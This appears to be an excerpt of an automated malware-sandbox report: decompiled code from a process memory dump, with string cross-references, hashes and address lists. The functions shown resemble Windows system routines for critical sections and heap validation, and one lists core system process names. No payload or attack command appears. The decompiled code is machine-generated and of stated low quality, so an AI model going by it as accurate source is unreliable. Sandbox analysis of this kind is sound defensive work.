Instruction Fuzzy Hash: D2B022328028C0CAFB20EB200B08B0B3A00ABC0302F22C0A2E2030380E833CE080F232

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04CE8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

double initialized or corrupted critical section, xrefs: 04D25313
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 04D252ED
Critical section address, xrefs: 04D25230, 04D252C7, 04D2533F
Address of the debug info found in the active list., xrefs: 04D252B9, 04D25305
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 04D25215, 04D252A1, 04D25324
Invalid debug info address of this critical section, xrefs: 04D252C1
Thread identifier, xrefs: 04D25345
Critical section debug info address, xrefs: 04D2522A, 04D25339
corrupted critical section, xrefs: 04D252CD
8, xrefs: 04D250EE
Critical section address., xrefs: 04D2530D
undeleted critical section in freed memory, xrefs: 04D25236
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 04D252D9
Thread is in a state in which it cannot own a critical section, xrefs: 04D2534E

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 5ddd6d06f8aab28e0cd64c60c7858831e8792a76b3291e48d5525905f6d36a7c
Instruction ID: 537d1a333fbed7c2ccd4dee088bc063c14cf86cfcf06a42fbfd73846d4286075
Opcode Fuzzy Hash: 5ddd6d06f8aab28e0cd64c60c7858831e8792a76b3291e48d5525905f6d36a7c
Instruction Fuzzy Hash: 55818970A41358BBEF20DF95C944FAEBBF6FB09B18F204069E945A7240D775B940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D586C2 Relevance: 12.6, Strings: 10, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04D586C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x4dab370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E04CB0670() & 0x00010000) != 0) {
					L26:
					 *0x4da38c0 = _t90;
					_t90 = 1;
				} else {
					if(E04CB42B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E04CE4E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = E04CF7AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = E04CF7AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x4c8708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E04CE4F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = E04CF7AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return E04CF4B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}

0x04d586c2
0x04d586c2
0x04d586ca
0x04d586d7
0x04d586e6
0x04d586e8
0x04d586f3
0x04d586fe
0x04d58700
0x04d5870b
0x04d58716
0x04d58721
0x04d5872c
0x04d5873a
0x04d58892
0x04d58892
0x04d5889a
0x04d58740
0x04d5875e
0x04d5877f
0x04d5877f
0x04d58787
0x04d587c0
0x00000000
0x04d587c6
0x04d587c8
0x04d587d1
0x04d587d3
0x04d587d9
0x04d587e8
0x04d587e8
0x04d587ee
0x00000000
0x00000000
0x04d587e2
0x04d587f4
0x04d5884f
0x04d58853
0x04d58875
0x04d58886
0x04d5888b
0x04d58890
0x00000000
0x00000000
0x04d58890
0x04d587f6
0x04d587f6
0x04d587f6
0x04d587f9
0x04d587ff
0x04d58801
0x04d58803
0x04d58807
0x04d58807
0x04d58811
0x04d58816
0x04d5881b
0x04d58839
0x00000000
0x04d5881d
0x04d5881d
0x04d5881d
0x04d58820
0x04d58820
0x04d58823
0x04d58826
0x04d5882d
0x04d58835
0x00000000
0x04d58837
0x00000000
0x04d58837
0x04d58835
0x00000000
0x04d5883d
0x04d58841
0x04d58845
0x04d58846
0x04d5884a
0x04d58807
0x00000000
0x04d587ff
0x04d587e4
0x04d587e4
0x04d587e5
0x00000000
0x04d587e5
0x00000000
0x04d587e2
0x00000000
0x04d587f0
0x04d587c8
0x04d58789
0x04d58789
0x04d5878e
0x04d58793
0x04d58796
0x04d5879e
0x00000000
0x00000000
0x04d587b2
0x04d5879e
0x04d58760
0x04d5876f
0x04d58774
0x04d58779
0x00000000
0x00000000
0x00000000
0x00000000
0x04d58779
0x04d5875e
0x04d5889b
0x04d588a4
0x04d588a5
0x04d588b0

Strings

svchost.exe, xrefs: 04D586E8
heapType, xrefs: 04D5874B
services.exe, xrefs: 04D58716
runtimebroker.exe, xrefs: 04D586F3
SegmentHeap, xrefs: 04D58769
smss.exe, xrefs: 04D5870B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 04D58750
lsass.exe, xrefs: 04D58721
csrss.exe, xrefs: 04D58700
DefaultBrowser_NOPUBLISHERID, xrefs: 04D58880

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 2f123ea2bc6b78da0d64ccc7c0f24ca135a9ab2b243e7743bdac027383d8bbbd
Instruction ID: 362b89fd51bdd64f30ef1898bbfcae058ed8248cc936cb1184a599aa4907e40c
Opcode Fuzzy Hash: 2f123ea2bc6b78da0d64ccc7c0f24ca135a9ab2b243e7743bdac027383d8bbbd
Instruction Fuzzy Hash: 1A51E3715043109BD725EF149C44BABBBE9FB84384F14492DFD9983250EB30F514DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D60E6D Relevance: 11.8, Strings: 9, Instructions: 515
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E04D60E6D(intOrPtr* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t215;
				signed int _t230;
				signed char _t236;
				intOrPtr _t237;
				unsigned int _t250;
				signed int _t251;
				intOrPtr _t257;
				intOrPtr _t267;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t298;
				intOrPtr _t304;
				signed int* _t308;
				intOrPtr* _t309;
				intOrPtr* _t310;
				signed int _t317;
				signed int _t319;
				signed short _t322;
				signed short _t325;
				signed int _t327;
				signed int _t330;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				void* _t338;
				signed int _t344;
				intOrPtr* _t345;
				signed int _t352;
				signed int _t354;
				signed char _t356;
				signed int* _t357;
				signed int _t372;
				signed int _t374;
				signed int _t376;
				signed int _t379;
				signed char _t384;
				intOrPtr* _t387;
				signed int _t389;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t394;
				intOrPtr _t399;
				intOrPtr* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t416;

				_t345 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t194 = 0;
				_v8 = _v8 & 0;
				_t344 = __edx;
				_v12 = 0;
				_t401 = __ecx;
				_t402 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t403 = _v16;
					if( *((intOrPtr*)(_t344 + 0x2c)) == _t403) {
						__eflags =  *((intOrPtr*)(_t344 + 0x30)) - _t194;
						if( *((intOrPtr*)(_t344 + 0x30)) == _t194) {
							L107:
							return 1;
						}
						_t196 =  *[fs:0x30];
						__eflags =  *(_t196 + 0xc);
						if( *(_t196 + 0xc) == 0) {
							_push("HEAP: ");
							E04CAB910();
						} else {
							E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t344 + 0x30)));
						_push(_t344);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E04CAB910();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E04CAB910();
					} else {
						E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t403);
					_push( *((intOrPtr*)(_t344 + 0x2c)));
					_push(_t344);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t402;
					if( *(_t401 + 0x4c) != 0) {
						 *_t402 =  *_t402 ^  *(_t401 + 0x50);
						_t411 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
						if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
							_push(_t345);
							E04D6D646(_t344, _t401, _t402, _t401, _t402, _t411);
						}
					}
					if(_v8 != ( *(_t402 + 4) ^  *(_t401 + 0x54))) {
						_t215 =  *[fs:0x30];
						__eflags =  *(_t215 + 0xc);
						if( *(_t215 + 0xc) == 0) {
							_push("HEAP: ");
							E04CAB910();
						} else {
							E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t352 =  *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff;
						__eflags = _t352;
						_push(_t352);
						E04CAB910("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t402);
						L117:
						__eflags =  *(_t401 + 0x4c);
						if( *(_t401 + 0x4c) != 0) {
							 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
							 *_t402 =  *_t402 ^  *(_t401 + 0x50);
							__eflags =  *_t402;
						}
						goto L119;
					}
					_t230 =  *_t402 & 0x0000ffff;
					_t384 =  *(_t402 + 2);
					_t354 = _t230;
					_v8 = _t354;
					_v20 = _t354;
					_v28 = _t230 << 3;
					if((_t384 & 0x00000001) == 0) {
						__eflags =  *(_t401 + 0x40) & 0x00000040;
						_t356 = (_t354 & 0xffffff00 | ( *(_t401 + 0x40) & 0x00000040) != 0x00000000) & _t384 >> 0x00000002;
						__eflags = _t356 & 0x00000001;
						if((_t356 & 0x00000001) == 0) {
							L66:
							_t357 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t357 =  *_t357 + ( *_t402 & 0x0000ffff);
							__eflags =  *_t357;
							L67:
							_t236 =  *(_t402 + 6);
							if(_t236 == 0) {
								_t345 = _t401;
							} else {
								_t345 = (_t402 & 0xffff0000) - ((_t236 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t345 != _t344) {
								_t237 =  *[fs:0x30];
								__eflags =  *(_t237 + 0xc);
								if( *(_t237 + 0xc) == 0) {
									_push("HEAP: ");
									E04CAB910();
								} else {
									E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t402 + 6) & 0x000000ff);
								_push(_t402);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t402 + 7)) != 3) {
									__eflags =  *(_t401 + 0x4c);
									if( *(_t401 + 0x4c) != 0) {
										 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										__eflags =  *_t402;
									}
									_t402 = _t402 + _v28;
									__eflags = _t402;
									goto L86;
								}
								_t250 =  *(_t402 + 0x1c);
								if(_t250 == 0) {
									_t251 =  *_t402 & 0x0000ffff;
									__eflags = _t402 + _t251 * 8 -  *((intOrPtr*)(_t344 + 0x28));
									if(_t402 + _t251 * 8 ==  *((intOrPtr*)(_t344 + 0x28))) {
										__eflags =  *(_t401 + 0x4c);
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											__eflags =  *_t402;
										}
										goto L107;
									}
									_t257 =  *[fs:0x30];
									__eflags =  *(_t257 + 0xc);
									if( *(_t257 + 0xc) == 0) {
										_push("HEAP: ");
										E04CAB910();
									} else {
										E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t344 + 0x28)));
									_push(_t402);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E04CAB910();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t250 >> 0xc);
								if( *(_t401 + 0x4c) != 0) {
									 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
									 *_t402 =  *_t402 ^  *(_t401 + 0x50);
								}
								_t402 = _t402 + 0x20 +  *(_t402 + 0x1c);
								if(_t402 ==  *((intOrPtr*)(_t344 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t401 + 0x4c) != 0) {
										 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										_t429 =  *(_t402 + 3) - ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402);
										if( *(_t402 + 3) != ( *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402)) {
											_push(_t345);
											_t345 = _t401;
											E04D6D646(_t344, _t345, _t402, _t401, _t402, _t429);
										}
									}
									if( *(_t401 + 0x54) !=  *(_t402 + 4)) {
										_t267 =  *[fs:0x30];
										__eflags =  *(_t267 + 0xc);
										if( *(_t267 + 0xc) == 0) {
											_push("HEAP: ");
											E04CAB910();
										} else {
											E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t402 + 4) & 0x0000ffff ^  *(_t401 + 0x54) & 0x0000ffff);
										_push(_t402);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t401 + 0x4c) != 0) {
											 *(_t402 + 3) =  *(_t402 + 2) ^  *(_t402 + 1) ^  *_t402;
											 *_t402 =  *_t402 ^  *(_t401 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t291 = _v28 + 0xfffffff0;
						_v24 = _t291;
						__eflags = _t384 & 0x00000002;
						if((_t384 & 0x00000002) != 0) {
							__eflags = _t291 - 4;
							if(_t291 > 4) {
								_t291 = _t291 - 4;
								__eflags = _t291;
								_v24 = _t291;
							}
						}
						__eflags = _t384 & 0x00000008;
						if((_t384 & 0x00000008) == 0) {
							_t105 = _t402 + 0x10; // -8
							_t293 = E04D080A0(_t105, _t291, 0xfeeefeee);
							_v20 = _t293;
							__eflags = _t293 - _v24;
							if(_t293 != _v24) {
								_t294 =  *[fs:0x30];
								__eflags =  *(_t294 + 0xc);
								if( *(_t294 + 0xc) == 0) {
									_push("HEAP: ");
									E04CAB910();
								} else {
									E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _v20 + 8 + _t402;
								__eflags = _t298;
								_push(_t298);
								_push(_t402);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t372 =  *((intOrPtr*)(_t402 + 8));
							_t387 =  *((intOrPtr*)(_t402 + 0xc));
							_v24 = _t372;
							_v28 = _t387;
							_t304 =  *((intOrPtr*)(_t372 + 4));
							__eflags =  *_t387 - _t304;
							if( *_t387 != _t304) {
								L64:
								_push(0);
								_push( *_t387);
								_push(_t304);
								_t104 = _t402 + 8; // -16
								_t345 = 0xd;
								E04D75FED(_t345, _t401);
								goto L86;
							}
							_t59 = _t402 + 8; // -16
							__eflags =  *_t387 - _t59;
							_t374 = _v24;
							if( *_t387 != _t59) {
								goto L64;
							}
							 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) - _v20;
							_t389 =  *(_t401 + 0xb4);
							__eflags = _t389;
							if(_t389 == 0) {
								L35:
								_t308 = _v28;
								 *_t308 = _t374;
								 *(_t374 + 4) = _t308;
								__eflags =  *(_t402 + 2) & 0x00000008;
								if(( *(_t402 + 2) & 0x00000008) == 0) {
									L39:
									_t375 =  *_t402 & 0x0000ffff;
									_t309 = _t401 + 0xc0;
									_v28 =  *_t402 & 0x0000ffff;
									 *(_t402 + 2) = 0;
									 *((char*)(_t402 + 7)) = 0;
									__eflags =  *(_t401 + 0xb4);
									if( *(_t401 + 0xb4) == 0) {
										_t345 =  *_t309;
									} else {
										_t345 = E04CB1C0E(_t401, _t375);
										_t309 = _t401 + 0xc0;
									}
									__eflags = _t309 - _t345;
									if(_t309 == _t345) {
										L51:
										_t310 =  *((intOrPtr*)(_t345 + 4));
										__eflags =  *_t310 - _t345;
										if( *_t310 != _t345) {
											_push(0);
											_push( *_t310);
											__eflags = 0;
											_push(0);
											_push(_t345);
											_t345 = 0xd;
											E04D75FED(_t345, 0);
										} else {
											_t90 = _t402 + 8; // -16
											_t393 = _t90;
											 *_t393 = _t345;
											 *((intOrPtr*)(_t393 + 4)) = _t310;
											 *_t310 = _t393;
											 *((intOrPtr*)(_t345 + 4)) = _t393;
										}
										 *((intOrPtr*)(_t401 + 0x74)) =  *((intOrPtr*)(_t401 + 0x74)) + ( *_t402 & 0x0000ffff);
										_t392 =  *(_t401 + 0xb4);
										__eflags = _t392;
										if(_t392 == 0) {
											L61:
											__eflags =  *(_t401 + 0x4c);
											if(__eflags != 0) {
												 *(_t402 + 3) =  *(_t402 + 1) ^  *_t402 ^  *(_t402 + 2);
												 *_t402 =  *_t402 ^  *(_t401 + 0x50);
											}
											goto L86;
										} else {
											_t376 =  *_t402 & 0x0000ffff;
											while(1) {
												__eflags = _t376 -  *((intOrPtr*)(_t392 + 4));
												if(_t376 <  *((intOrPtr*)(_t392 + 4))) {
													break;
												}
												_t317 =  *_t392;
												__eflags = _t317;
												if(_t317 == 0) {
													_t319 =  *((intOrPtr*)(_t392 + 4)) - 1;
													L60:
													_t97 = _t402 + 8; // -16
													_t345 = _t401;
													E04CB1B5D(_t345, _t392, 1, _t97, _t319, _t376);
													goto L61;
												}
												_t392 = _t317;
											}
											_t319 = _t376;
											goto L60;
										}
									} else {
										_t394 =  *(_t401 + 0x4c);
										while(1) {
											__eflags = _t394;
											if(_t394 == 0) {
												_t322 =  *(_t345 - 8) & 0x0000ffff;
											} else {
												_t325 =  *(_t345 - 8);
												_t394 =  *(_t401 + 0x4c);
												__eflags = _t394 & _t325;
												if((_t394 & _t325) != 0) {
													_t325 = _t325 ^  *(_t401 + 0x50);
													__eflags = _t325;
												}
												_t322 = _t325 & 0x0000ffff;
											}
											__eflags = _v28 - (_t322 & 0x0000ffff);
											if(_v28 <= (_t322 & 0x0000ffff)) {
												goto L51;
											}
											_t345 =  *_t345;
											__eflags = _t401 + 0xc0 - _t345;
											if(_t401 + 0xc0 != _t345) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t327 = E04CAF5C7(_t401, _t402);
								__eflags = _t327;
								if(_t327 != 0) {
									goto L39;
								}
								_t345 = _t401;
								E04CAF113(_t345, _t402,  *_t402 & 0x0000ffff, 1);
								goto L86;
							}
							_t379 =  *_t402 & 0x0000ffff;
							while(1) {
								__eflags = _t379 -  *((intOrPtr*)(_t389 + 4));
								if(_t379 <  *((intOrPtr*)(_t389 + 4))) {
									break;
								}
								_t330 =  *_t389;
								__eflags = _t330;
								if(_t330 == 0) {
									_t332 =  *((intOrPtr*)(_t389 + 4)) - 1;
									L34:
									_t66 = _t402 + 8; // -16
									E04CC036A(_t401, _t389, 1, _t66, _t332, _t379);
									_t374 = _v24;
									goto L35;
								}
								_t389 = _t330;
							}
							_t332 = _t379;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t402 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E04D5D62C(_t401, _t402) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t384 & 0x00000002) == 0) {
							_t336 =  *(_t402 + 3) & 0x000000ff;
						} else {
							_t338 = E04CE3AE9(_t402);
							_t354 = _v20;
							_t336 =  *(_t338 + 2) & 0x0000ffff;
						}
						_t416 = _t336;
						if(_t416 == 0) {
							goto L18;
						}
						if(_t416 >= 0) {
							__eflags = _t336 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t336 -  *((intOrPtr*)(_t401 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t399 = _a20;
							_t337 = _t336 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t399 + _t337 * 4)) =  *((intOrPtr*)(_t399 + _t337 * 4)) + _t354;
							goto L18;
						}
						_t337 = _t336 & 0x00007fff;
						if(_t337 >= 0x81) {
							goto L18;
						}
						_t399 = _a24;
						goto L17;
					}
					L86:
				} while (_t402 <  *((intOrPtr*)(_t344 + 0x28)));
				_t194 = _v12;
				goto L88;
			}

0x04d60e6d
0x04d60e75
0x04d60e79
0x04d60e7b
0x04d60e7f
0x04d60e81
0x04d60e86
0x04d60e88
0x04d60e8d
0x04d61221
0x04d61221
0x04d61227
0x04d61434
0x04d61437
0x04d61357
0x00000000
0x04d61357
0x04d6143d
0x04d61443
0x04d61447
0x04d61466
0x04d6146b
0x04d61449
0x04d6145e
0x04d61463
0x04d61471
0x04d61474
0x04d61477
0x04d61478
0x04d6142a
0x04d6142a
0x04d6140e
0x00000000
0x04d6140e
0x04d61237
0x04d61415
0x04d6141a
0x04d6123d
0x04d61252
0x04d61257
0x04d61420
0x04d61421
0x04d61424
0x04d61425
0x00000000
0x00000000
0x00000000
0x00000000
0x04d60e93
0x04d60e93
0x04d60e9a
0x04d60e9c
0x04d60ea1
0x04d60eab
0x04d60eae
0x04d60eb0
0x04d60eb5
0x04d60eb5
0x04d60eae
0x04d60ec6
0x04d613a4
0x04d613aa
0x04d613ae
0x04d613cd
0x04d613d2
0x04d613b0
0x04d613c5
0x04d613ca
0x04d613e2
0x04d613e7
0x04d613e7
0x04d613e9
0x04d613f0
0x04d613f8
0x04d613f8
0x04d613fc
0x04d61406
0x04d6140c
0x04d6140c
0x04d6140c
0x00000000
0x04d613fc
0x04d60ecc
0x04d60ecf
0x04d60ed2
0x04d60ed7
0x04d60eda
0x04d60edd
0x04d60ee3
0x04d60f58
0x04d60f64
0x04d60f66
0x04d60f69
0x04d61139
0x04d6113c
0x04d6113f
0x04d61144
0x04d61144
0x04d61146
0x04d61146
0x04d6114b
0x04d61165
0x04d6114d
0x04d6115d
0x04d6115d
0x04d61169
0x04d61360
0x04d61366
0x04d6136a
0x04d61389
0x04d6138e
0x04d6136c
0x04d61381
0x04d61386
0x04d61398
0x04d61399
0x04d6139a
0x00000000
0x04d6116f
0x04d61173
0x04d611fc
0x04d61200
0x04d6120a
0x04d61210
0x04d61210
0x04d61210
0x04d61212
0x04d61212
0x00000000
0x04d61212
0x04d61179
0x04d6117e
0x04d612f4
0x04d612fa
0x04d612fd
0x04d61341
0x04d61345
0x04d6134f
0x04d61355
0x04d61355
0x04d61355
0x00000000
0x04d61345
0x04d612ff
0x04d61305
0x04d61309
0x04d61328
0x04d6132d
0x04d6130b
0x04d61320
0x04d61325
0x04d61333
0x04d61336
0x04d61337
0x04d612a0
0x04d612a0
0x00000000
0x04d612a5
0x04d61184
0x04d6118a
0x04d61191
0x04d6119b
0x04d611a1
0x04d611a1
0x04d611a9
0x04d611ae
0x04d611f6
0x04d611f6
0x00000000
0x04d611b0
0x04d611b4
0x04d611b9
0x04d611c3
0x04d611c6
0x04d611c8
0x04d611cb
0x04d611cd
0x04d611cd
0x04d611c6
0x04d611da
0x04d612ad
0x04d612b3
0x04d612b7
0x04d612d6
0x04d612db
0x04d612b9
0x04d612ce
0x04d612d3
0x04d612eb
0x04d612ec
0x04d612ed
0x00000000
0x04d611e0
0x04d611e4
0x04d611ee
0x04d611f4
0x04d611f4
0x00000000
0x04d611e4
0x04d611da
0x04d611ae
0x04d61169
0x04d60f72
0x04d60f75
0x04d60f78
0x04d60f7b
0x04d60f7d
0x04d60f80
0x04d60f82
0x04d60f82
0x04d60f85
0x04d60f85
0x04d60f80
0x04d60f88
0x04d60f8b
0x04d61124
0x04d61128
0x04d6112d
0x04d61130
0x04d61133
0x04d6125d
0x04d61263
0x04d61267
0x04d61286
0x04d6128b
0x04d61269
0x04d6127e
0x04d61283
0x04d61297
0x04d61297
0x04d61299
0x04d6129a
0x04d6129b
0x00000000
0x04d6129b
0x00000000
0x04d60f91
0x04d60f91
0x04d60f94
0x04d60f97
0x04d60f9a
0x04d60f9d
0x04d60fa0
0x04d60fa2
0x04d61106
0x04d61106
0x04d61108
0x04d6110c
0x04d6110d
0x04d61113
0x04d61114
0x00000000
0x04d61114
0x04d60fa8
0x04d60fab
0x04d60fad
0x04d60fb0
0x00000000
0x00000000
0x04d60fb9
0x04d60fbc
0x04d60fc2
0x04d60fc4
0x04d60fec
0x04d60fec
0x04d60fef
0x04d60ff1
0x04d60ff4
0x04d60ff8
0x04d61021
0x04d61021
0x04d61024
0x04d6102c
0x04d6102f
0x04d61032
0x04d61035
0x04d6103b
0x04d61050
0x04d6103d
0x04d61046
0x04d61048
0x04d61048
0x04d61052
0x04d61054
0x04d61087
0x04d61087
0x04d6108a
0x04d6108c
0x04d6109d
0x04d6109f
0x04d610a1
0x04d610a3
0x04d610a5
0x04d610a8
0x04d610a9
